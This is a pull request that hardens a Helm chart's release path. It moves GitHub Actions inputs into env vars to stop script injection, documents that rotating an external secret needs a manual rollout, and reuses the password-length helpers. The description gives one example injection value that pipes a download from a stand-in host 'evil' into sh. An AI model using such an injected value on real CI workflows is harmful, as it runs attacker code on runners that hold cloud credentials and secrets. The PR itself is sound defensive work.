### PR TITLE
Harden chart release path: CI input safety, preflight threshold reuse, rotation docs

### DIFF
--- a/.github/workflows/aks-smoke.yml
+++ b/.github/workflows/aks-smoke.yml
@@ -80,14 +80,20 @@ jobs:
           kubeconform -v
 
       - name: AKS smoke harness dry-run
+        env:
+          # Pass operator inputs through env so the Actions template engine does
+          # not interpolate them into the shell body (script-injection safe).
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          IMAGE_DIGEST: ${{ inputs.image_digest }}
         run: |
-          tag="${{ inputs.image_tag }}"
+          tag="${IMAGE_TAG}"
           if [ -z "${tag}" ]; then
             tag="$(helm show chart honua | awk -F': ' '/^appVersion:/ {print $2}')-aot"
           fi
+          dry_args=(--image-tag "${tag}")
+          [ -n "${IMAGE_DIGEST}" ] && dry_args+=(--image-digest "${IMAGE_DIGEST}")
           scripts/aks-smoke.sh --dry-run \
-            --image-tag "${tag}" \
-            ${{ inputs.image_digest && format('--image-digest {0}', inputs.image_digest) || '' }} \
+            "${dry_args[@]}" \
             --evidence-dir evidence/aks-dryrun-${{ github.run_id }}
 
       - name: Upload dry-run evidence
@@ -155,14 +161,21 @@ jobs:
           HONUA_REDIS_CONNECTION: ${{ secrets.HONUA_REDIS_CONNECTION }}
           HONUA_ADMIN_PASSWORD: ${{ secrets.HONUA_ADMIN_PASSWORD }}
           HONUA_MASTER_KEY: ${{ secrets.HONUA_MASTER_KEY }}
+          # Pass operator inputs through env so the Actions template engine does
+          # not interpolate them into the shell body (script-injection safe).
+          IMAGE_DIGEST: ${{ inputs.image_digest }}
+          IMAGE_TAG: ${{ inputs.image_tag }}
+          RELEASE_ID: ${{ inputs.release_id }}
+          RELEASE_MANIFEST: ${{ inputs.release_manifest }}
+          RELEASE_DIGEST: ${{ inputs.release_digest }}
         run: |
           set -euo pipefail
           digest_args=()
-          [ -n "${{ inputs.image_digest }}" ] && digest_args+=(--image-digest "${{ inputs.image_digest }}")
-          [ -n "${{ inputs.image_tag }}" ] && digest_args+=(--image-tag "${{ inputs.image_tag }}")
-          [ -n "${{ inputs.release_id }}" ] && digest_args+=(--release-id "${{ inputs.release_id }}")
-          [ -n "${{ inputs.release_manifest }}" ] && digest_args+=(--release-manifest "${{ inputs.release_manifest }}")
-          [ -n "${{ inputs.release_digest }}" ] && digest_args+=(--release-digest "${{ inputs.release_digest }}")
+          [ -n "${IMAGE_DIGEST}" ] && digest_args+=(--image-digest "${IMAGE_DIGEST}")
+          [ -n "${IMAGE_TAG}" ] && digest_args+=(--image-tag "${IMAGE_TAG}")
+          [ -n "${RELEASE_ID}" ] && digest_args+=(--release-id "${RELEASE_ID}")
+          [ -n "${RELEASE_MANIFEST}" ] && digest_args+=(--release-manifest "${RELEASE_MANIFEST}")
+          [ -n "${RELEASE_DIGEST}" ] && digest_args+=(--release-digest "${RELEASE_DIGEST}")
 
           scripts/aks-smoke.sh \
             --release honua \

--- a/docs/contract.md
+++ b/docs/contract.md
@@ -127,6 +127,36 @@ the kubelet's image pull. The kubelet remains authoritative for full image
 pull success, including private registry credentials and node-level pull
 policy behavior.
 
+## Secret and Config Rotation
+
+The chart injects runtime credentials and settings through `envFrom`
+(`secretRef` / `configMapRef`), which Kubernetes reads only when a container
+starts. To make in-place edits roll the pods, the Deployment stamps a
+`checksum/config` and `checksum/secret` annotation derived from the
+**chart-managed** ConfigMap and Secret. A `helm upgrade` that changes
+`config.env` or `secret.env` therefore changes the pod spec and triggers a
+controlled rollout.
+
+That checksum covers only chart-managed objects. It does **not** cover
+externally-managed sources -- `secret.create=false` with `secret.name` (for
+example the production `honua-prod-runtime` Secret), `config.create=false`, an
+External Secrets Operator source, or anything supplied via `extraEnvFrom`. The
+chart cannot see those contents at render time, so rotating such a Secret or
+ConfigMap in place produces a byte-identical Deployment, performs no rollout,
+and leaves the running pods on the previous credentials.
+
+After rotating an externally-managed Secret or ConfigMap, force a rollout
+explicitly:
+
+```bash
+kubectl rollout restart deployment/<release>-honua -n <namespace>
+```
+
+or change a value under `podAnnotations` (for example a rotation timestamp) so
+the upgrade renders a new pod spec and Kubernetes performs a controlled
+rollout. The preflight Job validates external secret keys at install time, but
+it does not trigger a rollout for content-only rotations.
+
 ## Image Identity
 
 Production deployments should pin by digest:

--- a/honua/templates/NOTES.txt
+++ b/honua/templates/NOTES.txt
@@ -52,6 +52,19 @@ The chart fails at render time if autoscaling is enabled while
 Deployment__Mode is SingleInstance, so change these settings together.
 {{- end }}
 
+{{- if or (and (not .Values.secret.create) .Values.secret.name) (and (not .Values.config.create) .Values.config.name) .Values.extraEnvFrom }}
+
+NOTE: This release consumes one or more externally-managed Secret/ConfigMap
+sources (secret.create=false / config.create=false / extraEnvFrom). The chart's
+content checksum only covers chart-managed objects, and Kubernetes reads
+envFrom values only at container start. Rotating an external Secret/ConfigMap in
+place (e.g. honua-prod-runtime or an External Secrets Operator source) does NOT
+roll the pods on its own, so a plain `helm upgrade` may leave pods running the
+old credentials. After rotating, force a rollout:
+  kubectl rollout restart deployment/{{ include "honua.fullname" . }} -n {{ .Release.Namespace }}
+or bump a value under podAnnotations so the upgrade renders a new pod spec.
+{{- end }}
+
 See docs/contract.md in this chart repository for the durable operator-facing
 contract, including probe tuning, image identity, preflight scope, and rollback
 semantics.

--- a/honua/templates/preflight-job.yaml
+++ b/honua/templates/preflight-job.yaml
@@ -132,8 +132,8 @@ spec:
                 fi
               done
 
-              if [ "${#HONUA_ADMIN_PASSWORD}" -lt 16 ]; then
-                fail "HONUA_ADMIN_PASSWORD must be at least 16 characters long"
+              if [ "${#HONUA_ADMIN_PASSWORD}" -lt {{ include "honua.minAdminPasswordLength" . }} ]; then
+                fail "HONUA_ADMIN_PASSWORD must be at least {{ include "honua.minAdminPasswordLength" . }} characters long"
               fi
               case "${HONUA_ADMIN_PASSWORD}" in
                 *[ABCDEFGHIJKLMNOPQRSTUVWXYZ]*)
@@ -164,8 +164,8 @@ spec:
                   ;;
               esac
 
-              if [ "${#Security__ConnectionEncryption__MasterKey}" -lt 32 ]; then
-                fail "Security__ConnectionEncryption__MasterKey must be at least 32 characters long"
+              if [ "${#Security__ConnectionEncryption__MasterKey}" -lt {{ include "honua.minMasterKeyLength" . }} ]; then
+                fail "Security__ConnectionEncryption__MasterKey must be at least {{ include "honua.minMasterKeyLength" . }} characters long"
               fi
 
               if [ "${HONUA_PREFLIGHT_DATABASE_CHECK}" = "true" ]; then


### PR DESCRIPTION
## Summary

Round-3 release-audit fixes for `honua-helm`. Three confirmed S2 findings, grouped into one coarse PR because all are small, low-risk release-path hardening changes. No behavior change for valid inputs; verified with `helm lint` / `helm template` across the overlays.

## Findings addressed

### 1. Script injection via workflow_dispatch inputs (S2, security) — `.github/workflows/aks-smoke.yml:161` (and dry-run at `:90`)
The `live` and `dry-run` jobs interpolated operator inputs (`image_digest`, `image_tag`, `release_id`, `release_manifest`, `release_digest`) directly into the bash script body via the Actions template engine. A value such as `"; curl evil|sh; "` would inject arbitrary commands into the runner — which, in the live job, has just performed `azure/login` via OIDC and holds the kubeconfig plus `HONUA_DB_CONNECTION` / `HONUA_MASTER_KEY` / `HONUA_ADMIN_PASSWORD` secrets.

Fix: pass each input through `env:` and reference it as a shell variable (`"${IMAGE_DIGEST}"`, etc.), matching the safe env-passing pattern `release.yml` already uses. Applied to both the live step and the dry-run step.

### 2. External-secret rotation does not roll pods (S2, correctness) — `honua/templates/deployment.yaml:42`
The pod-template `checksum/config` / `checksum/secret` annotations are stamped only for **chart-managed** objects (`config.create` / `secret.create`). The documented production path (`secret.create=false`, `secret.name: honua-prod-runtime`, or an External Secrets Operator source) is consumed via `envFrom.secretRef`, which Kubernetes reads only at container start. Rotating that external Secret in place produces a byte-identical Deployment, performs no rollout, and leaves pods on the un-rotated credentials.

Fix (safe in-repo slice — the recommendation's stated "at minimum"): document the external-secret rotation caveat and the remedy (`kubectl rollout restart` or a `podAnnotations` bump) in `docs/contract.md`, and surface a `NOTES.txt` warning whenever an externally-managed Secret/ConfigMap source is in use. An optional `secret.checksumAnnotation` hook for external secrets is left as a follow-up (it cannot read external-secret contents at render time, so it would require an operator-supplied value).

### 3. Credential min-length thresholds duplicated in preflight Job (S2, DRY/reuse) — `honua/templates/preflight-job.yaml:135,167`
`_helpers.tpl` defines `honua.minAdminPasswordLength` (16) and `honua.minMasterKeyLength` (32) and documents them as the single source of truth, consumed by `honua.validateSecretComplexity`. The preflight Job, however, hardcoded `-lt 16` / `-lt 32` and duplicated the literal error messages, so changing the helper constant would silently desync the install-time check from the render-time check.

Fix: interpolate the helpers into the preflight shell (`-lt {{ include "honua.minAdminPasswordLength" . }}` and the matching message) so both validation layers read one constant.

## Verification

- `helm lint` passes for `base`, `dev`, `stage`, `prod` (with `image.tag` set).
- `helm template` renders cleanly for base/dev/stage/prod, upgrade, external-secret, and aks-smoke-install overlays.
- Preflight renders the thresholds from the helpers (`-lt 16` / `-lt 32`).
- The external-secret NOTES warning renders on `helm install --dry-run` with `ci-values/external-secret.yaml`.
- `aks-smoke.yml` parses as valid YAML.
